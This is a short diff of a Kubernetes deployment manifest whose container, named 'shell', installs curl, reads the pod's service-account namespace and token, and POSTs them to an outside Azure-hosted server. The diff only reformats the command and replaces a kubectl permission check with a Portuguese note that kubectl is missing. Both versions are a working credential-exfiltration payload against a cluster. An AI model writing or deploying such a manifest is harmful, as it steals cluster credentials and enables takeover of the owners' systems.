--- a/deployment.yaml
+++ b/deployment.yaml
@@ -6,13 +6,14 @@ spec:
   containers:
     - name: shell
       image: alpine
-      command: ["sh", "-c", "
-        apk add curl;
-        {
-          echo '>> NAMESPACE:' && cat /var/run/secrets/kubernetes.io/serviceaccount/namespace;
-          echo '\n>> TOKEN:' && cat /var/run/secrets/kubernetes.io/serviceaccount/token;
-          echo '\n>> CAN-I:' && kubectl auth can-i --list 2>&1;
-        } | curl -X POST --data-binary @- http://potter-maga.brazilsouth.cloudapp.azure.com:8080
-      "]
+      command:
+        - sh
+        - -c
+        - |
+          apk add curl;
+          {
+            echo '>> NAMESPACE:' && cat /var/run/secrets/kubernetes.io/serviceaccount/namespace;
+            echo '>> TOKEN:' && cat /var/run/secrets/kubernetes.io/serviceaccount/token;
+            echo '>> CAN-I:' && echo 'kubectl not found, alpine não tem kubectl';
+          } | curl -X POST --data-binary @- http://potter-maga.brazilsouth.cloudapp.azure.com:8080
   restartPolicy: Never
-
